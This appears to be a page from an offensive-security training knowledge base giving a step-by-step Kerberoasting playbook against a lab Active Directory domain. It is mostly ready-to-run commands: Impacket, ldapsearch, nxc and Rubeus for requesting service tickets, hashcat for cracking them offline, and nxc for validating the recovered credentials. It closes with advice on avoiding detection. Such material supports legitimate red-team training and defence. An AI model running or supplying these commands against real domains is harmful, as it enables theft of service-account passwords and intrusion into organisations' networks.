Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter IV - Active Directory / 04. Techniques / Service Principals / Techniques

Kerberoasting

Kerberoasting is SPN abuse because the presence of a user-owned SPN lets any domain user request a service ticket encrypted with that user's password-derived key. We crack that ticket offline to recover the service account password.

Enumerate roastable SPNs

GetUserSPNs.py ootw.local/student:'student' -dc-ip 10.10.10.200
ldapsearch -LLL -x -H ldap://10.10.10.200 -D "ootw.local\\student" -w 'student' -b "DC=ootw,DC=local" '(&(samAccountType=805306368)(servicePrincipalName=*))' sAMAccountName servicePrincipalName msDS-SupportedEncryptionTypes

Request all roastable tickets

GetUserSPNs.py ootw.local/student:'student' -dc-ip 10.10.10.200 -request -outputfile kerberoast.hashes
nxc ldap 10.10.10.200 -u student -p 'student' --kerberoast kerberoast.hashes

Request one account

GetUserSPNs.py ootw.local/student:'student' -dc-ip 10.10.10.200 -request-user svc_sql -outputfile svc_sql.hash

Windows

Rubeus.exe kerberoast /nowrap /outfile:kerberoast.hashes
Rubeus.exe kerberoast /spn:MSSQLSvc/sql01.ootw.local:1433 /simple /nowrap

Crack

hashcat -m 13100 kerberoast.hashes /usr/share/wordlists/rockyou.txt -r rules/best64.rule -O -w 3
hashcat -m 19600 kerberoast.hashes /usr/share/wordlists/rockyou.txt
hashcat -m 19700 kerberoast.hashes /usr/share/wordlists/rockyou.txt

Validate

nxc smb 10.10.10.200 -u svc_sql -p '<CRACKED_PASSWORD>' -d ootw.local
nxc ldap 10.10.10.200 -u svc_sql -p '<CRACKED_PASSWORD>' -d ootw.local

Notes

  • User-owned SPNs are the classic Kerberoast target.
  • Computer-owned SPNs are usually protected by machine account passwords and are not the normal first roast target.
  • MSSQLSvc, HTTP, and custom service classes are common high-value user-owned SPNs. The SPN tells us which service to investigate after cracking the account.
  • Mass kerberoasting is noisy - try to target particular targets instead.